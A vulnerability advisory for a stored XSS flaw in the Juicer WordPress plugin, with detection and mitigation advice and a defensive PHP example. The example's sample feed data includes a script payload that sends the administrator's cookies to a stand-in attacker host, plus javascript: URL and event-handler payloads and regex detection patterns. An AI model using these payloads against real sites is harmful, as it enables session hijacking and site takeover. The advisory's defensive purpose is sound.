CVE-2026-53737
Status: Deferred - Pending Action

Cross-Site Scripting in Juicer Feed API Response

Vulnerability report for CVE-2026-53737, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-06-10

Last updated on: 2026-06-10

Assigner: VulnCheck

Description

Juicer through 1.12.18 fails to escape remote feed API response fields before rendering them on the admin settings page. Attackers controlling the connected feed data can inject script that executes in an administrator's browser when the settings page loads.

Meta Information

Published: 2026-06-10
Last Modified: 2026-06-10
EPSS Evaluated: 2026-06-30

Affected Vendors & Products

1 associated CPE

Vendor   Product   Version / Range
juicer   juicer    through 1.12.18 (inclusive)

Exploitability

CWE-79: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Executive Summary

Juicer through version 1.12.18 does not escape the fields of the remote feed API response before rendering them on the admin settings page.

An attacker who controls the data served by a connected feed can therefore place script in those fields, and that script executes in an administrator's browser whenever the settings page loads.

Impact Analysis

This is a cross-site scripting (XSS) flaw: script chosen by whoever controls the feed data runs inside an administrator's authenticated session on the site.

Script in that context can perform any action the administrator can (in WordPress that includes creating users, changing settings and installing plugins), read sensitive page content, and hijack the session; the practical outcome is control of the site rather than a cosmetic defacement.

Compliance Impact

The vulnerability is a stored Cross-Site Scripting (XSS) issue that allows attackers to inject malicious scripts into the admin settings page of the Juicer plugin. This could potentially lead to unauthorized access or manipulation of administrative functions.

While the provided information does not explicitly mention compliance with standards such as GDPR or HIPAA, vulnerabilities like stored XSS can pose risks to data integrity and confidentiality, which are critical aspects of these regulations.

Organizations using the affected Juicer plugin should consider the risk of this vulnerability in their compliance assessments, as exploitation could lead to unauthorized actions or data exposure that might violate regulatory requirements.

Detection Guidance

This vulnerability is a cross-site scripting (XSS) issue in which script carried in remote feed API response fields is rendered unescaped on the Juicer admin settings page and executes in the administrator's browser. The payload lives in the remote feed data rather than in content the site itself stores: it is fetched when the settings page loads, so a scan of the WordPress database alone is not a reliable indicator.

Detection comes down to two checks: confirm whether the installed Juicer version is 1.12.18 or earlier, and inspect what the settings page renders from the connected feeds for markup or script that feed data should never contain.

Since this is a web application vulnerability affecting the admin interface, network-level detection is limited. However, you can perform the following checks:

  • Check the installed Juicer version (from the WordPress Plugins page, or `wp plugin list` with WP-CLI); 1.12.18 and earlier are affected.
  • With browser developer tools or an intercepting proxy (Burp Suite, OWASP ZAP), inspect the admin settings page and the feed API responses it renders for script elements, event-handler attributes or javascript: URLs in feed-supplied fields.
  • Monitor HTTP traffic to the admin settings page and to the remote feed endpoints for script tags or other markup in API response fields.

The available resources provide no command-line or network signature for direct detection on the host or network.

Mitigation Strategies

To mitigate this XSS vulnerability in Juicer versions up to and including 1.12.18:

  • Update the Juicer plugin to a release later than 1.12.18 in which the vulnerability is fixed.
  • Restrict who can open the Juicer settings page; every administrator who loads it renders the feed data, so fewer privileged viewers means fewer exposed sessions.
  • Connect only feeds whose content you control or trust; anyone who can write to a connected feed can place script in the data the plugin renders.
  • Until the update is applied, treat every field of the feed API response as untrusted and escape it for its output context (HTML text, attribute, URL) before it is rendered on the settings page.

These interim measures reduce exposure until the update is applied; they do not replace it.
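The checks in the Detection Guidance and the escaping step in the Mitigation Strategies, as an added PHP example that is not Juicer's own code: a constructed feed API response, a version check against 1.12.18, a detector that flags script-bearing fields in the raw response, and the vulnerable string-concatenation render beside a per-context escaped version. The field names (name, source_url, description) and the JSON shape are assumptions for illustration, not Juicer's real schema.

```php
<?php
// Added example for CVE-2026-53737; mocks the pattern the advisory describes
// (remote feed API fields rendered into the admin settings page) in plain PHP
// so it runs stand-alone. Field names and JSON layout are assumptions.
declare(strict_types=1);

// Constructed feed API response. The attacker controls the feed, so every
// field is untrusted. Feed 1 carries three payloads, one per output context.
const SAMPLE_FEED_JSON = '{"feeds":[
  {"name":"Marketing","source_url":"https://example.com/feed","description":"Weekly posts"},
  {"name":"<script>fetch(\"https://attacker.example/?c=\"+document.cookie)</script>",
   "source_url":"javascript:alert(document.domain)",
   "description":"x\" onmouseover=\"alert(1)"}
]}';

// 1. Version check: releases up to and including 1.12.18 are affected.
function juicer_is_affected(string $installed_version): bool {
    return version_compare($installed_version, '1.12.18', '<=');
}

// 2. Detection: flag feed fields carrying markup or script-capable values.
//    Run over the raw API response before it reaches any template.
function find_suspicious_fields(array $feed): array {
    $patterns = [
        '/<\s*script\b/i',     // inline script element
        '/\bon[a-z]+\s*=/i',   // HTML event-handler attribute
        '/^\s*javascript:/i',  // javascript: URL scheme
        '/[<>"\']/',           // any markup-significant character
    ];
    $hits = [];
    foreach ($feed as $field => $value) {
        if (!is_string($value)) { continue; }
        foreach ($patterns as $p) {
            if (preg_match($p, $value)) { $hits[] = $field; break; }
        }
    }
    return $hits;
}

// 3a. Vulnerable pattern: remote fields concatenated straight into HTML.
function render_row_vulnerable(array $feed): string {
    return '<tr><td>' . $feed['name'] . '</td>'
         . '<td><a href="' . $feed['source_url'] . '">' . $feed['source_url'] . '</a></td>'
         . '<td title="' . $feed['description'] . '">' . $feed['description'] . '</td></tr>';
}

// 3b. Hardened pattern: escape for the context each value lands in. Inside
//     WordPress the equivalents are esc_html(), esc_attr() and esc_url();
//     plain PHP is used here so the file runs without WordPress.
function esc_html_(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}
function esc_attr_(string $s): string { return esc_html_($s); }
function esc_url_(string $s): string {
    // Only http(s) is acceptable for a feed source; any other scheme is dropped.
    $scheme = strtolower((string) parse_url(trim($s), PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? esc_attr_($s) : '';
}
function render_row_hardened(array $feed): string {
    return '<tr><td>' . esc_html_($feed['name']) . '</td>'
         . '<td><a href="' . esc_url_($feed['source_url']) . '">' . esc_html_($feed['source_url']) . '</a></td>'
         . '<td title="' . esc_attr_($feed['description']) . '">' . esc_html_($feed['description']) . '</td></tr>';
}

$data = json_decode(SAMPLE_FEED_JSON, true, 512, JSON_THROW_ON_ERROR);
printf("1.12.18 affected: %s, 1.12.19 affected: %s\n",
    juicer_is_affected('1.12.18') ? 'yes' : 'no',
    juicer_is_affected('1.12.19') ? 'yes' : 'no');
foreach ($data['feeds'] as $i => $feed) {
    $hits = find_suspicious_fields($feed);
    printf("feed[%d] suspicious fields: %s\n", $i, $hits ? implode(', ', $hits) : 'none');
    echo "  vulnerable: " . render_row_vulnerable($feed) . "\n";
    echo "  hardened:   " . render_row_hardened($feed) . "\n";
}
```

The second feed shows why one escaping function is not enough: the name needs HTML-text escaping, the description breaks out of a title attribute and needs attribute escaping, and the source URL is a javascript: scheme that no amount of character escaping neutralizes, so it has to be rejected by scheme. The detector is a triage aid for reviewing feed data, not a substitute for escaping on output.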
